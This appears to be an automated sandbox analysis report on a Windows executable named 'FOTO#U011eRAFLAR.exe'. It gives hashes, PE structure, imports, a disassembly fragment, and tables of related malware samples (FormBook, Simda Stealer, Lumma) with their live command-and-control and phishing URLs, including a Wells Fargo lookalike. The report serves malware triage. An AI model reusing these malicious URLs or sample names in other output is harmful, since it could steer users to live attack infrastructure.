                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                    • Execution Graph export aborted for target GhotoFFnRo.exe, PID 3568 because it is empty
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                    • VT rate limit hit for: FOTO#U011eRAFLAR.exe
                                                                    TimeTypeDescription
                                                                    12:48:08API Interceptor6187770x Sleep call for process: winver.exe modified
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    103.21.221.4Z6s208B9QX.exeGet hashmaliciousFormBookBrowse
                                                                    • www.tempatmudisini01.click/abla/
                                                                    -pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                    • www.tempatmudisini01.click/iydt/
                                                                    UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                    • www.tempatmudisini01.click/iydt/
                                                                    RFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                                                                    • www.tempatmudisini01.click/abla/
                                                                    Purchase Order_ AEPL-2324-1126.exeGet hashmaliciousFormBookBrowse
                                                                    • www.tempatmudisini01.click/phdl/
                                                                    ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                                    • www.tempatmudisini01.click/lybf/
                                                                    SecuriteInfo.com.Win32.Malware-gen.10660.18305.exeGet hashmaliciousFormBookBrowse
                                                                    • www.tempatmudisini01.click/r9rj/
                                                                    SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exeGet hashmaliciousFormBookBrowse
                                                                    • www.tempatmudisini01.click/abla/
                                                                    13.248.169.48Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousFormBookBrowse
                                                                    • www.dreampay.shop/a18n/?mRu=GNYnn+/HdyV8duRMqtcyXm0xy6A5R7OP0g3qQsxli+rcIWT14zRUDqgxNRAzolcecH8yu9AKKAak4SdSyZ6RvIdAVt2QUT1IwNlPBAoCd8CxXhf8uuYrVNc=&UJ=7H1XM
                                                                    Order.exeGet hashmaliciousFormBookBrowse
                                                                    • www.sonoscan.org/ew98/
                                                                    Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                    • www.ipk.app/phav/
                                                                    RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                                                    • www.hopeisa.live/v0jl/
                                                                    8dPlV2lT8o.exeGet hashmaliciousSimda StealerBrowse
                                                                    • pupydeq.com/login.php
                                                                    7ObLFE2iMK.exeGet hashmaliciousSimda StealerBrowse
                                                                    • pupydeq.com/login.php
                                                                    UMwpXhA46R.exeGet hashmaliciousSimda StealerBrowse
                                                                    • pupydeq.com/login.php
                                                                    1fWgBXPgiT.exeGet hashmaliciousSimda StealerBrowse
                                                                    • pupydeq.com/login.php
                                                                    arxtPs1STE.exeGet hashmaliciousSimda StealerBrowse
                                                                    • pupydeq.com/login.php
                                                                    Z8eHwAvqAh.exeGet hashmaliciousSimda StealerBrowse
                                                                    • pupydeq.com/login.php
                                                                    No context
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    CLOUDFLARENETUShttps://sites.google.com/lecollectivem.com/rfp/homeGet hashmaliciousUnknownBrowse
                                                                    • 104.21.68.132
                                                                    https://alessiabelltravel.comGet hashmaliciousUnknownBrowse
                                                                    • 104.17.25.14
                                                                    Fizetes_12112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 188.114.97.3
                                                                    https://welsfargo.com-onlinebanking.com/Xb1ExYUR6VXl0bGxmVDdXaVpyTzlKZUtudEIxbGsxOGY1VzhSNFZvZVlFTDk5T0c2Q25PS3hwcEYrL1dZdG8vVzZIUS9mVHczWklvQ1R0U1ZXaVN0L2RuN0VIbklqdzFUWVROV3E4ZnVldDhWUmZ3RDRZWmFKY0ZJOUlTWWlqWHVxNDlVTUYxYVFDQ1dBWTd0bzVKbGIrL25HZVVOTHNSMnNBcGJuaVRrZW82VHY3RVlnYThxbUpLN2lBPT0tLTRmTmYwUzZkLzlIS1VWQ2otLVNXQlpnWjRKZDUxaGNXQmpCWksyN3c9PQ==?cid=2251351141Get hashmaliciousKnowBe4Browse
                                                                    • 104.17.25.14
                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                    • 104.21.0.123
                                                                    Salary Amendment.xlsxGet hashmaliciousUnknownBrowse
                                                                    • 188.114.97.3
                                                                    https://oqumcrpv8e.beefreecontent.comGet hashmaliciousUnknownBrowse
                                                                    • 104.17.247.203
                                                                    Salary Amendment.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                    • 188.114.97.3
                                                                    file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                    • 172.64.41.3
                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                    • 104.21.0.123
                                                                    LINKNET-ID-APLinknetASNIDamen.arm6.elfGet hashmaliciousMiraiBrowse
                                                                    • 139.255.236.186
                                                                    amen.m68k.elfGet hashmaliciousUnknownBrowse
                                                                    • 139.43.9.147
                                                                    sora.mips.elfGet hashmaliciousMiraiBrowse
                                                                    • 139.255.236.186
                                                                    byte.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                                                                    • 139.25.197.11
                                                                    wZU2edEGL3.elfGet hashmaliciousUnknownBrowse
                                                                    • 139.44.166.66
                                                                    jew.spc.elfGet hashmaliciousMiraiBrowse
                                                                    • 139.40.24.226
                                                                    la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                    • 139.33.31.27
                                                                    nabsh4.elfGet hashmaliciousUnknownBrowse
                                                                    • 139.43.29.216
                                                                    ppc.elfGet hashmaliciousUnknownBrowse
                                                                    • 139.40.72.147
                                                                    nklmpsl.elfGet hashmaliciousUnknownBrowse
                                                                    • 139.37.141.60
                                                                    CLOUDFLARENETUShttps://sites.google.com/lecollectivem.com/rfp/homeGet hashmaliciousUnknownBrowse
                                                                    • 104.21.68.132
                                                                    https://alessiabelltravel.comGet hashmaliciousUnknownBrowse
                                                                    • 104.17.25.14
                                                                    Fizetes_12112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 188.114.97.3
                                                                    https://welsfargo.com-onlinebanking.com/Xb1ExYUR6VXl0bGxmVDdXaVpyTzlKZUtudEIxbGsxOGY1VzhSNFZvZVlFTDk5T0c2Q25PS3hwcEYrL1dZdG8vVzZIUS9mVHczWklvQ1R0U1ZXaVN0L2RuN0VIbklqdzFUWVROV3E4ZnVldDhWUmZ3RDRZWmFKY0ZJOUlTWWlqWHVxNDlVTUYxYVFDQ1dBWTd0bzVKbGIrL25HZVVOTHNSMnNBcGJuaVRrZW82VHY3RVlnYThxbUpLN2lBPT0tLTRmTmYwUzZkLzlIS1VWQ2otLVNXQlpnWjRKZDUxaGNXQmpCWksyN3c9PQ==?cid=2251351141Get hashmaliciousKnowBe4Browse
                                                                    • 104.17.25.14
                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                    • 104.21.0.123
                                                                    Salary Amendment.xlsxGet hashmaliciousUnknownBrowse
                                                                    • 188.114.97.3
                                                                    https://oqumcrpv8e.beefreecontent.comGet hashmaliciousUnknownBrowse
                                                                    • 104.17.247.203
                                                                    Salary Amendment.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                    • 188.114.97.3
                                                                    file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                    • 172.64.41.3
                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                    • 104.21.0.123
                                                                    AMAZON-02UShttps://alessiabelltravel.comGet hashmaliciousUnknownBrowse
                                                                    • 143.204.98.65
                                                                    wavjjT3sEq.exeGet hashmaliciousFormBookBrowse
                                                                    • 54.179.173.60
                                                                    http://jackelec.com.au/Get hashmaliciousHTMLPhisherBrowse
                                                                    • 52.77.158.64
                                                                    https://welsfargo.com-onlinebanking.com/Xb1ExYUR6VXl0bGxmVDdXaVpyTzlKZUtudEIxbGsxOGY1VzhSNFZvZVlFTDk5T0c2Q25PS3hwcEYrL1dZdG8vVzZIUS9mVHczWklvQ1R0U1ZXaVN0L2RuN0VIbklqdzFUWVROV3E4ZnVldDhWUmZ3RDRZWmFKY0ZJOUlTWWlqWHVxNDlVTUYxYVFDQ1dBWTd0bzVKbGIrL25HZVVOTHNSMnNBcGJuaVRrZW82VHY3RVlnYThxbUpLN2lBPT0tLTRmTmYwUzZkLzlIS1VWQ2otLVNXQlpnWjRKZDUxaGNXQmpCWksyN3c9PQ==?cid=2251351141Get hashmaliciousKnowBe4Browse
                                                                    • 52.217.224.48
                                                                    http://iposeidonbussiness.com/img/event_egghunt2.zipGet hashmaliciousUnknownBrowse
                                                                    • 52.15.180.19
                                                                    https://oqumcrpv8e.beefreecontent.comGet hashmaliciousUnknownBrowse
                                                                    • 108.138.26.51
                                                                    file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                    • 108.156.211.59
                                                                    https://ampa.fi/uEvMZCXCvXGet hashmaliciousUnknownBrowse
                                                                    • 18.245.31.5
                                                                    ACHAT DE 2 IMMEUBLES.pdfGet hashmaliciousUnknownBrowse
                                                                    • 18.155.173.98
                                                                    linux_x64_agent_no_crypt.elfGet hashmaliciousUnknownBrowse
                                                                    • 54.171.230.55
                                                                    No context
                                                                    No context
                                                                    Process:C:\Windows\SysWOW64\winver.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Reputation:high, very likely benign file
                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\FOTO#U011eRAFLAR.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):288768
                                                                    Entropy (8bit):7.994513988027257
                                                                    Encrypted:true
                                                                    SSDEEP:6144:goGooooooojooooooooooooooooooooooooooooooooooooooooooooooooooooW:goGooooooojoooooooooooooooooooo2
                                                                    MD5:360E3262481095FB849EC81170081D8C
                                                                    SHA1:B65EB75D20EEA136E96A3741F4320B9CFB6BCC2F
                                                                    SHA-256:18035D4B9AE58BD9FB5968471949461B4FC4938ECADC3FD673762120F741EE94
                                                                    SHA-512:E0792381162447E238541977887236EFEFC077AC0DDDA60AB37FF63FD685B0630929F637D89AA0A202D7C1CA6D26D193020074B1C6CF401B147E07695F5FCE00
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:.....RNOAa..:...f.KR..gB1..66HPZLKQ2RNOA95R366HPZLKQ2RNOA.5R38).^Z.B...O...a:ZE.8"5+90_r-./WZ&.TSh"/"k8\r....X=WS.E]PhKQ2RNOA@4[..V/.g,,..2).[....VQ.J..mR5.U..nSQ..99$v1U.NOA95R36f.PZ.JP2Rcl.95R366HP.LIP9SEOAo1R366HPZLK1&RNOQ95RC26HP.LKA2RNMA93R366HPZJKQ2RNOA9EV364HPZLKQ0R..A9%R3&6HPZ\KQ"RNOA95B366HPZLKQ2RNOA95R366HPZLKQ2RNOA95R366HPZLKQ2RNOA95R366HPZLKQ2RNOA95R366HPZLKQ2RNOA95R366HPZLKQ2RNOA95R366HPZLKQ2RNOA95R366HPZLKQ2RNa5\M&366<.^LKA2RN.E95B366HPZLKQ2RNOA.5RS66HPZLKQ2RNOA95R366HPZLKQ2RNOA95R366HPZLKQ2RNOA95R366HPZLKQ2RNOA95R366HPZLKQ2RNOA95R366HPZLKQ2RNOA95R366HPZLKQ2RNOA95R366HPZLKQ2RNOA95R366HPZLKQ2RNOA95R366HPZLKQ2RNOA95R366HPZLKQ2RNOA95R366HPZLKQ2RNOA95R366HPZLKQ2RNOA95R366HPZLKQ2RNOA95R366HPZLKQ2RNOA95R366HPZLKQ2RNOA95R366HPZLKQ2RNOA95R366HPZLKQ2RNOA95R366HPZLKQ2RNOA95R366HPZLKQ2RNOA95R366HPZLKQ2RNOA95R366HPZLKQ2RNOA95R366HPZLKQ2RNOA95R366HPZLKQ2RNOA95R366HPZLKQ2RNOA95R366HPZLKQ2RNOA95R366HPZLKQ2RNOA95R366HPZLKQ2RNOA95R366HPZLKQ2RNOA95R366HPZLKQ2RNOA95R366HPZLKQ2RNOA95R36
                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):7.4108802579140916
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:FOTO#U011eRAFLAR.exe
                                                                    File size:1'600'512 bytes
                                                                    MD5:0bb932f92b40eec8d5bc5b595b948096
                                                                    SHA1:80b4d5920f31854c1cdcd64eee626cb3d00b711d
                                                                    SHA256:e8b8745486749347b6b3621bce50bfb3d5ba080fa71bf30c444dc86def6e56c3
                                                                    SHA512:60e8264afe14b9521e770a83ad9b1deec0f371a28bef2096bd39eabadca1b6f25c3d47b119373d45e9e5e32ccaa68ceab13436f54d911dfbea861ac799d70fff
                                                                    SSDEEP:24576:R5EmXFtKaL4/oFe5T9yyXYfP1ijXdaeUvSFGfYYJAbu80+h5v1OrL2ixY/ohwROI:RPVt/LZeJbInQRaeU4YJ4ZfYEo2
                                                                    TLSH:6B75D0027381D062FFAB91334B5AF6215BBC7A260123A61F13981DB9FD705B1563E7A3
                                                                    File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                                                                    Icon Hash:aaf3e3e3938382a0
                                                                    Entrypoint:0x4204f7
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x673143A6 [Sun Nov 10 23:37:10 2024 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:5
                                                                    OS Version Minor:1
                                                                    File Version Major:5
                                                                    File Version Minor:1
                                                                    Subsystem Version Major:5
                                                                    Subsystem Version Minor:1
                                                                    Import Hash:0b768923437678ce375719e30b21693e
                                                                    Instruction
                                                                    call 00007F04F4F93D63h
                                                                    jmp 00007F04F4F9366Fh
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    push esi
                                                                    push dword ptr [ebp+08h]
                                                                    mov esi, ecx
                                                                    call 00007F04F4F9384Dh
                                                                    mov dword ptr [esi], 0049FE10h
                                                                    mov eax, esi
                                                                    pop esi
                                                                    pop ebp
                                                                    retn 0004h
                                                                    and dword ptr [ecx+04h], 00000000h
                                                                    mov eax, ecx
                                                                    and dword ptr [ecx+08h], 00000000h
                                                                    mov dword ptr [ecx+04h], 0049FE18h
                                                                    mov dword ptr [ecx], 0049FE10h
                                                                    ret
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    push esi
                                                                    push dword ptr [ebp+08h]
                                                                    mov esi, ecx
                                                                    call 00007F04F4F9381Ah
                                                                    mov dword ptr [esi], 0049FE2Ch
                                                                    mov eax, esi
                                                                    pop esi
                                                                    pop ebp
                                                                    retn 0004h
                                                                    and dword ptr [ecx+04h], 00000000h
                                                                    mov eax, ecx
                                                                    and dword ptr [ecx+08h], 00000000h
                                                                    mov dword ptr [ecx+04h], 0049FE34h
                                                                    mov dword ptr [ecx], 0049FE2Ch
                                                                    ret
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    push esi
                                                                    mov esi, ecx
                                                                    lea eax, dword ptr [esi+04h]
                                                                    mov dword ptr [esi], 0049FDF0h
                                                                    and dword ptr [eax], 00000000h
                                                                    and dword ptr [eax+04h], 00000000h
                                                                    push eax
                                                                    mov eax, dword ptr [ebp+08h]
                                                                    add eax, 04h
                                                                    push eax
                                                                    call 00007F04F4F9641Dh
                                                                    pop ecx
                                                                    pop ecx
                                                                    mov eax, esi
                                                                    pop esi
                                                                    pop ebp
                                                                    retn 0004h
                                                                    lea eax, dword ptr [ecx+04h]
                                                                    mov dword ptr [ecx], 0049FDF0h
                                                                    push eax
                                                                    call 00007F04F4F96468h
                                                                    pop ecx
                                                                    ret
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    push esi
                                                                    mov esi, ecx
                                                                    lea eax, dword ptr [esi+04h]
                                                                    mov dword ptr [esi], 0049FDF0h
                                                                    push eax
                                                                    call 00007F04F4F96451h
                                                                    test byte ptr [ebp+08h], 00000001h
                                                                    pop ecx
                                                                    Programming Language:
                                                                    • [ C ] VS2008 SP1 build 30729
                                                                    • [IMP] VS2008 SP1 build 30729
                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e740x17c.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000xb00f4.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1850000x75cc.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0xb10100x1c.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0xc34200x18.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10300x40.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x9aa370x9ac0017187df51446e12491449bc34d849147False0.5653003205775444data6.665680008888402IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rdata0x9c0000x2fb920x2fc008ab1e4a7788882b436d7b30c3a4c9b0cFalse0.3529327552356021data5.692798211199345IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data0xcc0000x705c0x4800c69381d9330fec33b92360836b24215aFalse0.043511284722222224DOS executable (block device driver @\273\)0.5845774219571381IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .rsrc0xd40000xb00f40xb02009e225df6421aef46d3b3b71a5728ed46False0.9627478486515259data7.961547207098374IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0x1850000x75cc0x760040b4850993e12fb1b505490e48047c95False0.7645325741525424data6.798203799100818IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    RT_ICON0xd45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                    RT_ICON0xd46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                    RT_ICON0xd47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                    RT_ICON0xd49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                    RT_ICON0xd4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                    RT_ICON0xd4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                    RT_ICON0xd5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                    RT_ICON0xd64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                    RT_ICON0xd69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                    RT_ICON0xd8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                    RT_ICON0xda0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                    RT_MENU0xda4a00x50dataEnglishGreat Britain0.9
                                                                    RT_STRING0xda4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                    RT_STRING0xdaa840x68adataEnglishGreat Britain0.2735961768219833
                                                                    RT_STRING0xdb1100x490dataEnglishGreat Britain0.3715753424657534
                                                                    RT_STRING0xdb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                    RT_STRING0xdbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                    RT_STRING0xdc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                    RT_STRING0xdc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                    RT_RCDATA0xdc7b80xa73badata1.0003153349119545
                                                                    RT_GROUP_ICON0x183b740x76dataEnglishGreat Britain0.6610169491525424
                                                                    RT_GROUP_ICON0x183bec0x14dataEnglishGreat Britain1.25
                                                                    RT_GROUP_ICON0x183c000x14dataEnglishGreat Britain1.15
                                                                    RT_GROUP_ICON0x183c140x14dataEnglishGreat Britain1.25
                                                                    RT_VERSION0x183c280xdcdataEnglishGreat Britain0.6181818181818182
                                                                    RT_MANIFEST0x183d040x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                                    DLLImport
                                                                    WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                                    VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                    COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                    MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                                    WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                                    PSAPI.DLLGetProcessMemoryInfo
                                                                    IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                                    USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                                    UxTheme.dllIsThemeActive
                                                                    KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentThread, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, EnterCriticalSection, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                                                    USER32.dllIsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, TranslateMessage, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, GetKeyboardLayoutNameW, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, GetMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, 